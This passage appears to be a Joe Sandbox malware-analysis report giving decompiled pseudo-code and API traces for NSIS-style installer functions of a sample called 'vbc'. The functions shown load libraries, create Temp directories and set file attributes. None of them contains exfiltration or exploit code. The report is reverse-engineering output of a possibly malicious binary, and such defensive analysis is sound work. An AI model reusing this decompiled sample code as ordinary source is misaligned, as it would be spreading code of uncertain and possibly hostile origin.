                                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 946 4020d8-4020e4 947 4021a3-4021a5 946->947 948 4020ea-402100 call 402da6 * 2 946->948 949 4022f1-4022f6 call 401423 947->949 958 402110-40211f LoadLibraryExW 948->958 959 402102-40210e GetModuleHandleW 948->959 955 402c2a-402c39 949->955 961 402121-402130 call 406979 958->961 962 40219c-40219e 958->962 959->958 959->961 965 402132-402138 961->965 966 40216b-402170 call 40559f 961->966 962->949 967 402151-402164 call 73281817 965->967 968 40213a-402146 call 401423 965->968 970 402175-402178 966->970 974 402166-402169 967->974 968->970 979 402148-40214f 968->979 970->955 972 40217e-402188 call 403b8c 970->972 972->955 978 40218e-402197 FreeLibrary 972->978 974->970 978->955 979->970
                                                C-Code - Quality: 60%
                                                			E004020D8(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t23;
                                                				struct HINSTANCE__* _t31;
                                                				void* _t32;
                                                				WCHAR* _t35;
                                                				intOrPtr* _t36;
                                                				void* _t37;
                                                				void* _t39;
                                                
                                                				_t32 = __ebx;
                                                				asm("sbb eax, 0x434fc0");
                                                				 *(_t39 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                					return 0;
                                                				}
                                                				_t35 = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                					L3:
                                                					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                					_t47 = _t23 - _t32;
                                                					 *(_t39 + 8) = _t23;
                                                					if(_t23 == _t32) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                					if(_t36 == _t32) {
                                                						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                					} else {
                                                						 *(_t39 - 4) = _t32;
                                                						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                							if( *_t36() != 0) {
                                                								 *(_t39 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                						FreeLibrary( *(_t39 + 8));
                                                					}
                                                					goto L16;
                                                				}
                                                				_t31 = GetModuleHandleW(_t35); // executed
                                                				 *(_t39 + 8) = _t31;
                                                				if(_t31 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}










                                                0x004020d8
                                                0x004020d8
                                                0x004020dd
                                                0x004020e4
                                                0x004021a3
                                                0x004022f1
                                                0x004022f1
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c39
                                                0x00402c39
                                                0x004020f3
                                                0x004020fd
                                                0x00402100
                                                0x00402110
                                                0x00402114
                                                0x0040211a
                                                0x0040211c
                                                0x0040211f
                                                0x0040219c
                                                0x00000000
                                                0x0040219c
                                                0x00402121
                                                0x0040212c
                                                0x00402130
                                                0x00402170
                                                0x00402132
                                                0x00402135
                                                0x00402138
                                                0x00402164
                                                0x0040213a
                                                0x0040213d
                                                0x00402146
                                                0x00402148
                                                0x00402148
                                                0x00402146
                                                0x00402138
                                                0x00402178
                                                0x00402191
                                                0x00402191
                                                0x00000000
                                                0x00402178
                                                0x00402103
                                                0x0040210b
                                                0x0040210e
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                • Opcode Fuzzy Hash: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004015C1(short __ebx, void* __eflags) {
                                                				void* _t17;
                                                				int _t23;
                                                				void* _t25;
                                                				signed char _t26;
                                                				short _t28;
                                                				short _t31;
                                                				short* _t34;
                                                				void* _t36;
                                                
                                                				_t28 = __ebx;
                                                				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                				_t17 = E00405EB7(_t16);
                                                				_t32 = _t17;
                                                				if(_t17 != __ebx) {
                                                					do {
                                                						_t34 = E00405E39(_t32, 0x5c);
                                                						_t31 =  *_t34;
                                                						 *_t34 = _t28;
                                                						if(_t31 != _t28) {
                                                							L5:
                                                							_t25 = E00405AEB( *(_t36 + 8));
                                                						} else {
                                                							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                							}
                                                						}
                                                						if(_t25 != _t28) {
                                                							if(_t25 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                							} else {
                                                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                								if((_t26 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						 *_t34 = _t31;
                                                						_t32 = _t34 + 2;
                                                					} while (_t31 != _t28);
                                                				}
                                                				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E0040653D(0x441000,  *(_t36 + 8));
                                                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                					if(_t23 == 0) {
                                                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                				return 0;
                                                			}











                                                0x004015c1
                                                0x004015c9
                                                0x004015cc
                                                0x004015d1
                                                0x004015d5
                                                0x004015d7
                                                0x004015df
                                                0x004015e1
                                                0x004015e4
                                                0x004015ea
                                                0x00401604
                                                0x00401607
                                                0x004015ec
                                                0x004015ec
                                                0x004015ef
                                                0x00000000
                                                0x004015fa
                                                0x004015fd
                                                0x004015fd
                                                0x004015ef
                                                0x0040160e
                                                0x00401615
                                                0x00401624
                                                0x00401624
                                                0x00401617
                                                0x0040161a
                                                0x00401622
                                                0x00000000
                                                0x00000000
                                                0x00401622
                                                0x00401615
                                                0x00401627
                                                0x0040162b
                                                0x0040162c
                                                0x004015d7
                                                0x00401634
                                                0x00401663
                                                0x004022f1
                                                0x00401636
                                                0x00401638
                                                0x00401645
                                                0x0040164d
                                                0x00401655
                                                0x0040165b
                                                0x0040165b
                                                0x00401655
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID:
                                                • API String ID: 1892508949-0
                                                • Opcode ID: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                • Opcode Fuzzy Hash: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                				void* _t18;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x434f30;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                						 *0x433eec =  *0x433eec + _t12;
                                                						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                					}
                                                				}
                                                				return 0;
                                                			}











                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32 ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E00405672(signed int __eax) {
                                                				intOrPtr _v0;
                                                				intOrPtr _t10;
                                                				intOrPtr _t11;
                                                				intOrPtr* _t12;
                                                
                                                				_t11 =  *0x434f28;
                                                				_t10 =  *0x434f2c;
                                                				__imp__OleInitialize(0); // executed
                                                				 *0x434fc0 =  *0x434fc0 | __eax;
                                                				E004044E5(0);
                                                				if(_t10 != 0) {
                                                					_t12 = _t11 + 0xc;
                                                					while(1) {
                                                						_t10 = _t10 - 1;
                                                						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                							break;
                                                						}
                                                						_t12 = _t12 + 0x818;
                                                						if(_t10 != 0) {
                                                							continue;
                                                						} else {
                                                						}
                                                						goto L7;
                                                					}
                                                					 *0x434f8c =  *0x434f8c + 1;
                                                				}
                                                				L7:
                                                				E004044E5(0x404);
                                                				__imp__OleUninitialize();
                                                				return  *0x434f8c;
                                                			}







                                                0x00405673
                                                0x0040567a
                                                0x00405682
                                                0x00405688
                                                0x00405690
                                                0x00405697
                                                0x00405699
                                                0x0040569c
                                                0x0040569c
                                                0x004056a1
                                                0x00000000
                                                0x00000000
                                                0x004056b2
                                                0x004056ba
                                                0x00000000
                                                0x00000000
                                                0x004056bc
                                                0x00000000
                                                0x004056ba
                                                0x004056be
                                                0x004056be
                                                0x004056c4
                                                0x004056c9
                                                0x004056ce
                                                0x004056db

                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405682
                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                • OleUninitialize.OLE32 ref: 004056CE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                                                • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                • Opcode Fuzzy Hash: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040690A(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a3e0);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                				}
                                                				_t5 = E0040689A(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}





                                                0x00406912
                                                0x00406915
                                                0x0040691c
                                                0x00406924
                                                0x00406930
                                                0x00000000
                                                0x00406937
                                                0x00406927
                                                0x0040692e
                                                0x00000000
                                                0x0040693f
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesW(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}





                                                0x00406031
                                                0x0040603e
                                                0x00406053
                                                0x00406059

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406008(WCHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesW(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}





                                                0x0040600d
                                                0x00406013
                                                0x00406018
                                                0x00406021
                                                0x00406021
                                                0x0040602a

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405AEB(WCHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}




                                                0x00405af1
                                                0x00405af9
                                                0x00000000
                                                0x00405aff
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
